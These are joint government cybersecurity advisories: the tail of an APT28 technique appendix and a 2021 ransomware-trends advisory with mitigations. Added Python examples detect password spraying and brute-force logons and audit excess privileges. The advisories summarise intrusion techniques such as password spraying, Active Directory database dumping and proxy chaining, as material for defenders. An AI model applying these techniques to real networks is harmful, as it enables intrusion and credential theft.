T1589.001 | Gather Victim Identity Information: Credentials | Adversaries may gather credentials that can be used during targeting.

 

Initial Access [TA0001]

Initial Access consists of techniques that use various entry vectors to gain their initial foothold within a network. For example, the adversary may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion [T1078].[18] These specific actors obtained and abused credentials of domain [T1078.002] and cloud accounts [T1078.004].[19] The actors also used external remote services to gain access to systems [T1133].[20] The adversary took advantage of weaknesses in internet-facing servers and conducted SQL injection attacks against organizations' external websites [T1190].[21] Finally, they sent spearphishing emails with a malicious link in an attempt to gain access [T1566.002].[22] 
 

 

ID | Name | Description
T1078 | Valid Accounts | Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access.
T1078.002 | Valid Accounts: Domain Accounts | Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.
T1078.004 | Valid Accounts: Cloud Accounts | Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.
T1133 | External Remote Services | Adversaries may leverage external-facing remote services to initially access and/or persist within a network.
T1190 | Exploit Public-Facing Application | Adversaries may attempt to take advantage of a weakness in an internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior.
T1566.002 | Phishing: Spearphishing Link | Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems.

 

Persistence [TA0003]

Persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access. The adversary obtains and abuses credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion [T1078].[23]

 

ID | Name | Description
T1078 | Valid Accounts | Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.

Privilege Escalation [TA0004]

Privilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. The adversary obtains and abuses credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion [T1078].[24]  Specifically in this case, credentials of cloud accounts [T1078.004] were obtained and abused.[25]   

 

ID | Name | Description
T1078 | Valid Accounts | Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access.
T1078.004 | Valid Accounts: Cloud Accounts | Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.

Defense Evasion [TA0005]

Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. The adversary made its executables and files difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit [T1027].[26]
 

ID | Name | Description
T1027 | Obfuscated Files or Information | Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.

 

Credential Access [TA0006]

Credential Access consists of techniques for stealing credentials like account names and passwords. The adversary attempted to access or create a copy of the Active Directory (AD) domain database to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights [T1003.003].[27] The adversary also used a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials [T1110.003].[28]

ID | Name | Description
T1003.003 | OS Credential Dumping: NTDS | Adversaries may attempt to access or create a copy of the Active Directory domain database to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights.
T1110.003 | Brute Force: Password Spraying | Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials.

Discovery [TA0007]

Discovery consists of techniques an adversary may use to gain knowledge about the system and internal network. The adversary enumerated files and directories or searched in specific locations of a host or network share for certain information within a file system [T1083].[29]  In addition, the adversary attempted to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain or forest environments [T1482].[30] 

ID | Name | Description
T1083 | File and Directory Discovery | Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.
T1482 | Domain Trust Discovery | Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments.

 

Collection [TA0009]

Collection consists of both the techniques adversaries may use to gather information and the sources that information is collected from that are relevant to the adversary's objectives. The adversary leverages information repositories, such as SharePoint, to mine valuable information [T1213.002].[31]   

ID | Name | Description
T1213.002 | Data from Information Repositories: SharePoint | Adversaries may leverage the SharePoint repository as a source to mine valuable information.

 

Command and Control [TA0011]

Command and Control (C2) consists of techniques that adversaries may use to communicate with systems under their control within a victim network. The adversary chained together multiple proxies to disguise the source of malicious traffic. In this case, TOR and VPN servers are used as multi-hop proxies to route C2 traffic and obfuscate their activities [T1090.003].[32]
 

ID | Name | Description
T1090.003 | Proxy: Multi-hop Proxy | To disguise the source of malicious traffic, adversaries may chain together multiple proxies.

 

Additional Resources

[1] NSA, CISA, FBI, NCSC Cybersecurity Advisory: Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments, 1 July 2021.
[2] NSA Cybersecurity Advisory: Mitigating Recent VPN Vulnerabilities, 7 October 2019.
[3] NSA, CISA, FBI, NCSC Cybersecurity Advisory: Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments, 1 July 2021.
[4] Microsoft Article: AD Forest Recovery – Resetting the krbtgt password, 29 July 2021. 
[5] Microsoft GitHub: New-KrbtgtKeys.ps1, 14 May 2020.
[6] NSA Cybersecurity Information: Defend Privileges and Accounts, August 2019.
[7] Microsoft Article: Group Managed Service Accounts Overview, 29 July 2021.
[8] NSA Cybersecurity Information: Leverage Modern Hardware Security Features, August 2019.
[9] Microsoft Article: Protect derived domain credentials with Windows Defender Credential Guard, 3 December 2021.
[10] Microsoft Article: Windows Defender Credential Guard protection limits, 3 December 2021.
[11] Microsoft Article: Windows 11 requirements, 30 November 2021.
[12] Microsoft Blog Post: The Importance of KB2871997 and KB2928120 for Credential Protection, 20 September 2021.
[13] Microsoft Article: What’s New in Credential Protection, 7 January 2022.
[14] NSA Cybersecurity Factsheet: PowerShell: Security Risks and Defenses, 1 December 2016.
[15] NSA Cybersecurity Information: Update and Upgrade Software Immediately, August 2019.
[16] NSA Cybersecurity Information: Actively Manage Systems and Configurations, August 2019.
[17] MITRE Groups: APT28, 18 October 2021.
[18] MITRE Groups: APT28, 18 October 2021.
[19] MITRE Software: Cobalt Strike, 18 October 2021.
[20] Based on technical information shared by Mandiant.
[21] MITRE Groups: APT28, 18 October 2021.
[22] Based on technical information shared by Mandiant.
[23] MITRE Groups: APT28, 18 October 2021.
[24] MITRE Groups: APT28, 18 October 2021.
[25] MITRE Software: Cobalt Strike, 18 October 2021.
[26] MITRE Software: Fysbis, 6 November 2020. 
[27] MITRE Software: Koadic, 30 March 2020. 
[28] MITRE Groups: APT28, 18 October 2021.
[29] Based on technical information shared by Mandiant.
[30] Based on technical information shared by Mandiant.
[31] MITRE Groups: APT28, 18 October 2021.
[32] MITRE Groups: APT28, 18 October 2021.

Revisions
  • February 16, 2022: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.


AA22-040A: 2021 Trends Show Increased Globalized Threat of Ransomware

US-CERT Security Alerts - Wed, 02/09/2022 - 06:00
Original release date: February 9, 2022 | Last revised: February 10, 2022
Summary

Immediate Actions You Can Take Now to Protect Against Ransomware:
• Update your operating system and software.
• Implement user training and phishing exercises to raise awareness about the risk of suspicious links and attachments.
• If you use Remote Desktop Protocol (RDP), secure and monitor it.
• Make an offline backup of your data.
• Use multifactor authentication (MFA).

In 2021, cybersecurity authorities in the United States,[1][2][3] Australia,[4] and the United Kingdom[5] observed an increase in sophisticated, high-impact ransomware incidents against critical infrastructure organizations globally. The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the National Security Agency (NSA) observed incidents involving ransomware against 14 of the 16 U.S. critical infrastructure sectors, including the Defense Industrial Base, Emergency Services, Food and Agriculture, Government Facilities, and Information Technology Sectors. The Australian Cyber Security Centre (ACSC) observed continued ransomware targeting of Australian critical infrastructure entities, including in the Healthcare and Medical, Financial Services and Markets, Higher Education and Research, and Energy Sectors. The United Kingdom’s National Cyber Security Centre (NCSC-UK) recognizes ransomware as the biggest cyber threat facing the United Kingdom. Education is one of the top UK sectors targeted by ransomware actors, but the NCSC-UK has also seen attacks targeting businesses, charities, the legal profession, and public services in the Local Government and Health Sectors.

Ransomware tactics and techniques continued to evolve in 2021, which demonstrates ransomware threat actors’ growing technological sophistication and an increased ransomware threat to organizations globally.

This joint Cybersecurity Advisory—authored by cybersecurity authorities in the United States, Australia, and the United Kingdom—provides observed behaviors and trends as well as mitigation recommendations to help network defenders reduce their risk of compromise by ransomware.


Technical Details

Cybersecurity authorities in the United States, Australia, and the United Kingdom observed the following behaviors and trends among cyber criminals in 2021:

  • Gaining access to networks via phishing, stolen Remote Desktop Protocol (RDP) credentials or brute force, and exploiting vulnerabilities. Phishing emails, RDP exploitation, and exploitation of software vulnerabilities remained the top three initial infection vectors for ransomware incidents in 2021. Once a ransomware threat actor has gained code execution on a device or network access, they can deploy ransomware. Note: these infection vectors likely remain popular because of the increased use of remote work and schooling starting in 2020 and continuing through 2021. This increase expanded the remote attack surface and left network defenders struggling to keep pace with routine software patching.
  • Using cybercriminal services-for-hire. The market for ransomware became increasingly “professional” in 2021, and the criminal business model of ransomware is now well established. In addition to their increased use of ransomware-as-a-service (RaaS), ransomware threat actors employed independent services to negotiate payments, assist victims with making payments, and arbitrate payment disputes between themselves and other cyber criminals. NCSC-UK observed that some ransomware threat actors offered their victims the services of a 24/7 help center to expedite ransom payment and restoration of encrypted systems or data.

Note: cybersecurity authorities in the United States, Australia, and the United Kingdom assess that if the ransomware criminal business model continues to yield financial returns for ransomware actors, ransomware incidents will become more frequent. Every time a ransom is paid, it confirms the viability and financial attractiveness of the ransomware criminal business model. Additionally, cybersecurity authorities in the United States, Australia, and the United Kingdom note that the criminal business model often complicates attribution because there are complex networks of developers, affiliates, and freelancers; it is often difficult to identify conclusively the actors behind a ransomware incident.

  • Sharing victim information. Eurasian ransomware groups have shared victim information with each other, diversifying the threat to targeted organizations. For example, after announcing its shutdown, the BlackMatter ransomware group transferred its existing victims to infrastructure owned by another group, known as Lockbit 2.0. In October 2021, Conti ransomware actors began selling access to victims’ networks, enabling follow-on attacks by other cyber threat actors.
  • Shifting away from “big-game” hunting in the United States. 
    • In the first half of 2021, cybersecurity authorities in the United States and Australia observed ransomware threat actors targeting “big game” organizations—i.e., perceived high-value organizations and/or those that provide critical services—in several high-profile incidents. These victims included Colonial Pipeline Company, JBS Foods, and Kaseya Limited. However, ransomware groups suffered disruptions from U.S. authorities in mid-2021. Subsequently, the FBI observed some ransomware threat actors redirecting ransomware efforts away from “big-game” and toward mid-sized victims to reduce scrutiny. 
    • The ACSC observed ransomware continuing to target Australian organizations of all sizes, including critical services and “big game,” throughout 2021. 
    • NCSC-UK observed targeting of UK organizations of all sizes throughout the year, with some “big game” victims. Overall victims included businesses, charities, the legal profession, and public services in the Education, Local Government, and Health Sectors.
  • Diversifying approaches to extorting money. After encrypting victim networks, ransomware threat actors increasingly used “triple extortion” by threatening to (1) publicly release stolen sensitive information, (2) disrupt the victim’s internet access, and/or (3) inform the victim’s partners, shareholders, or suppliers about the incident. The ACSC continued to observe “double extortion” incidents in which a threat actor uses a combination of encryption and data theft to pressure victims to pay ransom demands. 

Ransomware groups have increased their impact by:

  • Targeting the cloud. Ransomware developers targeted cloud infrastructures to exploit known vulnerabilities in cloud applications, virtual machine software, and virtual machine orchestration software. Ransomware threat actors also targeted cloud accounts, cloud application programming interfaces (APIs), and data backup and storage systems to deny access to cloud resources and encrypt data. In addition to exploiting weaknesses to gain direct access, threat actors sometimes reach cloud storage systems by compromising local (on-premises) devices and moving laterally to the cloud systems. Ransomware threat actors have also targeted cloud service providers to encrypt large amounts of customer data.
  • Targeting managed service providers. Ransomware threat actors have targeted managed service providers (MSPs). MSPs have widespread and trusted accesses into client organizations. By compromising an MSP, a ransomware threat actor could access multiple victims through one initial compromise. Cybersecurity authorities in the United States, Australia, and the United Kingdom assess there will be an increase in ransomware incidents where threat actors target MSPs to reach their clients.
  • Attacking industrial processes. Although most ransomware incidents against critical infrastructure affect business information and technology systems, the FBI observed that several ransomware groups have developed code designed to stop critical infrastructure or industrial processes.
  • Attacking the software supply chain. Globally, in 2021, ransomware threat actors targeted software supply chain entities to subsequently compromise and extort their customers. Targeting software supply chains allows ransomware threat actors to increase the scale of their attacks by accessing multiple victims through a single initial compromise. 
  • Targeting organizations on holidays and weekends. The FBI and CISA observed cybercriminals conducting increasingly impactful attacks against U.S. entities on holidays and weekends throughout 2021. Ransomware threat actors may view holidays and weekends—when offices are normally closed—as attractive timeframes, as there are fewer network defenders and IT support personnel at victim organizations. For more information, see joint FBI-CISA Cybersecurity Advisory, Ransomware Awareness for Holidays and Weekends.

Mitigations

Cybersecurity authorities in the United States, Australia, and the United Kingdom recommend network defenders apply the following mitigations to reduce the likelihood and impact of ransomware incidents:

  • Keep all operating systems and software up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Regularly check for software updates and end of life (EOL) notifications, and prioritize patching known exploited vulnerabilities. In cloud environments, ensure that virtual machines, serverless applications, and third-party libraries are also patched regularly, as doing so is usually the customer’s responsibility. Automate software security scanning and testing when possible. Consider upgrading hardware and software, as necessary, to take advantage of vendor-provided virtualization and security capabilities.
  • If you use RDP or other potentially risky services, secure and monitor them closely.
    • Limit access to resources over internal networks, especially by restricting RDP and using virtual desktop infrastructure. After assessing risks, if RDP is deemed operationally necessary, restrict the originating sources and require MFA to mitigate credential theft and reuse. If RDP must be available externally, use a virtual private network (VPN), virtual desktop infrastructure, or other means to authenticate and secure the connection before allowing RDP to connect to internal devices. Monitor remote access/RDP logs, enforce account lockouts after a specified number of attempts to block brute force campaigns, log RDP login attempts, and disable unused remote access/RDP ports.
    • Ensure devices are properly configured and that security features are enabled. Disable ports and protocols that are not being used for a business purpose (e.g., RDP Transmission Control Protocol Port 3389). 
    • Restrict Server Message Block (SMB) Protocol within the network to only access servers that are necessary, and remove or disable outdated versions of SMB (i.e., SMB version 1). Threat actors use SMB to propagate malware across organizations.
    • Review the security posture of third-party vendors and those interconnected with your organization. Ensure all connections between third-party vendors and outside software or hardware are monitored and reviewed for suspicious activity.
    • Implement listing policies for applications and remote access that only allow systems to execute known and permitted programs under an established.
    • Open document readers in protected viewing modes to help prevent active content from running.
  • Implement a user training program and phishing exercises to raise awareness among users about the risks of visiting suspicious websites, clicking on suspicious links, and opening suspicious attachments. Reinforce the appropriate user response to phishing and spearphishing emails. 
  • Require MFA for as many services as possible—particularly for webmail, VPNs, accounts that access critical systems, and privileged accounts that manage backups. 
  • Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to have strong, unique passwords. Passwords should not be reused across multiple accounts or stored on the system where an adversary may have access. Note: devices with local admin accounts should implement a password policy, possibly using a password management solution (e.g., Local Administrator Password Solution [LAPS]), that requires strong, unique passwords for each admin account.
  • If using Linux, use a Linux security module (such as SELinux, AppArmor, or SecComp) for defense in depth. The security modules may prevent the operating system from making arbitrary connections, which is an effective mitigation strategy against ransomware, as well as against remote code execution (RCE).
  • Protect cloud storage by backing up to multiple locations, requiring MFA for access, and encrypting data in the cloud. If using cloud-based key management for encryption, ensure that storage and key administration roles are separated.
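
The RDP bullet above asks defenders to monitor remote access logs and block brute force campaigns, and the appendix of the earlier advisory describes password spraying [T1110.003] as a few common passwords tried against many accounts. The following is an added example, not code from either advisory, that separates the two patterns in failed-logon events and flags a success that follows either. It assumes Windows Security events (4625 failed logon, 4624 successful logon; logon type 3 or 10 for remote sessions); the thresholds, field names and sample events are constructed for illustration.

```python
from collections import Counter, defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=30)
SPRAY_MIN_ACCOUNTS = 5        # distinct accounts hit by one source inside WINDOW
SPRAY_MAX_PER_ACCOUNT = 2     # spraying stays under per-account lockout limits
BRUTE_MIN_FAILURES = 6        # repeated failures against a single account
REMOTE_LOGON_TYPES = {3, 10}  # 3 = Network (RDP with NLA), 10 = RemoteInteractive


def _ev(ts, event_id, logon_type, src, account):
    return {"time": datetime.fromisoformat(ts), "event_id": event_id,
            "logon_type": logon_type, "src": src, "account": account}


def build_sample_events():
    """Constructed events; the addresses are documentation ranges (RFC 5737)."""
    events = []
    # Source A: one failure against each of eight accounts, two minutes apart,
    # followed by a successful logon to one of them.
    for i in range(8):
        events.append(_ev(f"2022-02-12T02:{i * 2:02d}:00", 4625, 3,
                          "203.0.113.10", f"user{i:02d}"))
    events.append(_ev("2022-02-12T02:20:00", 4624, 10, "203.0.113.10", "user03"))
    # Source B: ten failures against one account within a minute.
    for i in range(10):
        events.append(_ev(f"2022-02-12T03:00:{i * 5:02d}", 4625, 10,
                          "198.51.100.7", "svc-backup"))
    # Source C: a user mistypes a password twice, then logs on (benign).
    events.append(_ev("2022-02-12T09:00:00", 4625, 10, "192.0.2.44", "alice"))
    events.append(_ev("2022-02-12T09:00:20", 4625, 10, "192.0.2.44", "alice"))
    events.append(_ev("2022-02-12T09:00:45", 4624, 10, "192.0.2.44", "alice"))
    return events


def detect(events):
    """Return findings in time order, one per (kind, source, account)."""
    findings, seen = [], set()
    failures = defaultdict(deque)  # src -> (time, account) failures inside WINDOW
    flagged = {}                   # src -> time the source last met a threshold

    def report(kind, src, account, when):
        key = (kind, src, account)
        if key not in seen:
            seen.add(key)
            findings.append({"kind": kind, "src": src,
                             "account": account, "time": when})

    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["logon_type"] not in REMOTE_LOGON_TYPES:
            continue
        src, now = ev["src"], ev["time"]
        window = failures[src]
        while window and now - window[0][0] > WINDOW:
            window.popleft()  # drop failures older than the sliding window
        if ev["event_id"] == 4625:
            window.append((now, ev["account"]))
            per_account = Counter(account for _, account in window)
            # Many accounts, few tries each: spraying evades per-account lockout.
            if (len(per_account) >= SPRAY_MIN_ACCOUNTS
                    and max(per_account.values()) <= SPRAY_MAX_PER_ACCOUNT):
                report("password_spray", src, None, now)
                flagged[src] = now
            # Many tries against one account: what an account lockout policy stops.
            if per_account[ev["account"]] >= BRUTE_MIN_FAILURES:
                report("brute_force", src, ev["account"], now)
                flagged[src] = now
        elif ev["event_id"] == 4624:
            # A success from a source that was just guessing is the urgent case.
            if src in flagged and now - flagged[src] <= WINDOW:
                report("success_after_guessing", src, ev["account"], now)
    return findings


if __name__ == "__main__":
    for f in detect(build_sample_events()):
        print(f["time"].isoformat(), f["kind"], f["src"], f["account"] or "-")
```

Per-account lockout alone does not stop the first pattern, which is why the detector keys on the source address rather than the account.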

Malicious cyber actors use system and network discovery techniques for network and system visibility and mapping. To limit an adversary’s ability to learn an organization’s enterprise environment and to move laterally, take the following actions: 

  • Segment networks. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement. Organizations with an international footprint should be aware that connectivity between their overseas arms can expand their threat surface; these organizations should implement network segmentation between international divisions where appropriate. For example, the ACSC has observed ransomware and data theft incidents in which Australian divisions of multinational companies were impacted by ransomware incidents affecting assets maintained and hosted by offshore divisions (outside their control).
  • Implement end-to-end encryption. Deploying mutual Transport Layer Security (mTLS) can prevent eavesdropping on communications, which, in turn, can prevent cyber threat actors from gaining insights needed to advance a ransomware attack.
  • Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a network-monitoring tool. To aid in detecting the ransomware, leverage a tool that logs and reports all network traffic, including lateral movement on a network. Endpoint detection and response tools are particularly useful for detecting lateral connections as they have insight into unusual network connections for each host. Artificial intelligence (AI)-enabled network intrusion detection systems (NIDS) are also able to detect and block many anomalous behaviors associated with early stages of ransomware deployment.
  • Document external remote connections. Organizations should document approved solutions for remote management and maintenance. If an unapproved solution is installed on a workstation, the organization should investigate it immediately. These solutions have legitimate purposes, so they will not be flagged by antivirus vendors.
  • Implement time-based access for privileged accounts. For example, the just-in-time access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the zero trust model) by setting network-wide policy to automatically disable admin accounts at the Active Directory level. As needed, individual users can submit requests through an automated process that enables access to a system for a set timeframe. In cloud environments, just-in-time elevation is also appropriate and may be implemented using per-session federated claims or privileged access management tools.
  • Enforce principle of least privilege through authorization policies. Minimize unnecessary privileges for identities. Consider privileges assigned to human identities as well as non-person (e.g., software) identities. In cloud environments, non-person identities (service accounts or roles) with excessive privileges are a key vector for lateral movement and data access. Account privileges should be clearly defined, narrowly scoped, and regularly audited against usage patterns.
  • Reduce credential exposure. Accounts and their credentials present on hosts can enable further compromise of a network. Enforcing credential protection—by restricting where accounts and credentials can be used and by using local device credential protection features—reduces opportunities for threat actors to collect credentials for lateral movement and privilege escalation.
  • Disable unneeded command-line utilities; constrain scripting activities and permissions, and monitor their usage. Privilege escalation and lateral movement often depend on software utilities that run from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally. Organizations should also disable macros sent from external sources via Group Policy.
  • Maintain offline (i.e., physically disconnected) backups of data, and regularly test backup and restoration. These practices safeguard an organization’s continuity of operations or at least minimize potential downtime from an attack as well as protect against data losses. In cloud environments, consider leveraging native cloud service provider backup and restoration capabilities. To further secure cloud backups, consider separation of account roles to prevent an account that manages the backups from being used to deny or degrade the backups should the account become compromised. 
  • Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure. Consider storing encryption keys outside the cloud. Cloud backups that are encrypted using a cloud key management service (KMS) could be affected should the cloud environment become compromised. 
  • Collect telemetry from cloud environments. Ensure that telemetry from cloud environments—including network telemetry (e.g., virtual private cloud [VPC] flow logs), identity telemetry (e.g., account sign-on, token usage, federation configuration changes), and application telemetry (e.g., file downloads, cross-organization sharing)—is retained and visible to the security team.
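
The least-privilege bullet above says account privileges should be regularly audited against usage patterns, for human and non-person identities alike. The following is an added example, not code from the advisory, of such an audit: it compares what each identity is granted with what the identity telemetry shows it used in a lookback period. The identities, action names in `service:Action` form, dates and the 90-day lookback are all constructed assumptions.

```python
from datetime import date, timedelta
from fnmatch import fnmatchcase

# Constructed grants: identity -> kind and granted action patterns.
SAMPLE_GRANTS = {
    "svc-backup": {"kind": "service",
                   "actions": {"storage:*", "keys:Decrypt", "identity:AssumeRole"}},
    "alice": {"kind": "human", "actions": {"storage:Read", "storage:Write"}},
    "bob": {"kind": "human", "actions": {"storage:Read", "compute:Start"}},
}

# Constructed usage telemetry: (identity, action, day it was used).
SAMPLE_USAGE = [
    ("svc-backup", "storage:Read", date(2022, 2, 1)),
    ("svc-backup", "storage:Write", date(2022, 2, 2)),
    ("svc-backup", "keys:Decrypt", date(2021, 9, 1)),  # older than the lookback
    ("alice", "storage:Read", date(2022, 1, 15)),
    ("alice", "storage:Write", date(2022, 1, 20)),
    ("bob", "storage:Read", date(2022, 2, 5)),
]


def audit_privileges(grants, usage, today, lookback_days=90):
    """List grants with no recent use and wildcard grants that can be narrowed."""
    cutoff = today - timedelta(days=lookback_days)
    recent = {}
    for identity, action, used_on in usage:
        if used_on >= cutoff:
            recent.setdefault(identity, set()).add(action)

    report = []
    for identity, grant in grants.items():
        used = recent.get(identity, set())
        remove, narrow = [], {}
        for pattern in sorted(grant["actions"]):
            matched = sorted(a for a in used if fnmatchcase(a, pattern))
            if not matched:
                remove.append(pattern)     # granted but never exercised
            elif "*" in pattern:
                narrow[pattern] = matched  # replace wildcard with what is used
        if remove or narrow:
            report.append({"identity": identity, "kind": grant["kind"],
                           "remove": remove, "narrow": narrow})
    # Non-person identities first, then by the number of excess grants.
    report.sort(key=lambda r: (r["kind"] != "service",
                               -(len(r["remove"]) + len(r["narrow"])),
                               r["identity"]))
    return report


if __name__ == "__main__":
    for row in audit_privileges(SAMPLE_GRANTS, SAMPLE_USAGE, date(2022, 2, 10)):
        print(row)
```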

Note: critical infrastructure organizations with industrial control systems/operational technology networks should review joint CISA-FBI Cybersecurity Advisory DarkSide Ransomware: Best Practices for Preventing Business Disruption from Ransomware Attacks for more recommendations, including mitigations to reduce the risk of severe business or functional degradation should their entity fall victim to ransomware. 

Responding to Ransomware Attacks

If a ransomware incident occurs at your organization, cybersecurity authorities in the United States, Australia, and the United Kingdom recommend organizations:

Note: cybersecurity authorities in the United States, Australia, and the United Kingdom strongly discourage paying a ransom to criminal actors. Criminal activity is motivated by financial gain, so paying a ransom may embolden adversaries to target additional organizations (or re-target the same organization) or encourage cyber criminals to engage in the distribution of ransomware. Paying the ransom also does not guarantee that a victim’s files will be recovered. Additionally, reducing the financial gain of ransomware threat actors will help disrupt the ransomware criminal business model.

Additionally, NCSC-UK reminds UK organizations that paying criminals is not condoned by the UK Government. In instances where a ransom is paid, victim organizations often cease engagement with authorities, who then lose visibility of the payments made. While it continues to prove challenging, the NCSC-UK has supported UK Government efforts by identifying needed policy changes—including measures about the cyber insurance industry and ransom payments—that could reduce the threat of ransomware.

Resources
  • For more information and resources on protecting against and responding to ransomware, refer to StopRansomware.gov, a centralized, U.S. whole-of-government webpage providing ransomware resources and alerts.
  • CISA’s Ransomware Readiness Assessment is a no-cost self-assessment based on a tiered set of practices to help organizations better assess how well they are equipped to defend and recover from a ransomware incident.
  • CISA offers a range of no-cost cyber hygiene services to help critical infrastructure organizations assess, identify, and reduce their exposure to threats, including ransomware. By requesting these services, organizations of any size could find ways to reduce their risk and mitigate attack vectors.
  • The U.S. Department of State’s Rewards for Justice (RFJ) program offers a reward of up to $10 million for reports of foreign government malicious activity against U.S. critical infrastructure. See the RFJ website for more information and how to report information securely.
  • The ACSC recommends organizations implement eight essential mitigation strategies from the ACSC’s Strategies to Mitigate Cyber Security Incidents as a cybersecurity baseline. These strategies, known as the “Essential Eight,” make it much harder for adversaries to compromise systems.
  • Refer to the ACSC’s practical guides on how to protect yourself against ransomware attacks and what to do if you are held to ransom at cyber.gov.au.
  • Refer to NCSC-UK’s guides on how to protect yourself against ransomware attacks and how to respond to and recover from them at ncsc.gov.uk/ransomware/home

Disclaimer

The information in this report is being provided “as is” for informational purposes only. The FBI, CISA, NSA, ACSC, and NCSC-UK do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation.

References

Revisions
  • February 9, 2022: Initial Version
  • February 10, 2022: Replaced PDF with 508 compliant PDF
